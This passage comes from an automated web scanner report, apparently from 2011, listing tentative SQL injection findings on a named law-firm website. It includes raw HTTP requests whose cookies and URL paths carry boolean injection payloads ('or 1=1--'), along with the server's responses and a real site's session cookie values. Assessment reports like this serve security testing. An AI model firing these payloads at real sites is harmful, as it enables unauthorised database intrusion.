GET /sifr3/gillsans.swf14043355'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/gillsans.swf14043355'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.31. http://www.curtis.com/sitecontent.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 18432304%20or%201%3d1--%20 and 18432304%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:01:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175952;path=/
Set-Cookie: CFTOKEN=14488976;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::offices::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...
1.32. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 90677941%20or%201%3d1--%20 and 90677941%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175975;path=/
Set-Cookie: CFTOKEN=25170816;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::offices::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...
1.33. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15382433'%20or%201%3d1--%20 and 15382433'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm15382433'%20or%201%3d1--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sitecontent.cfm15382433'%20or%201%3d2--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.34. http://www.curtis.com/sitecontent.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 74416649'%20or%201%3d1--%20 and 74416649'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:00:58 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...
1.35. http://www.curtis.com/sitecontent.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 13432204'%20or%201%3d1--%20 and 13432204'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
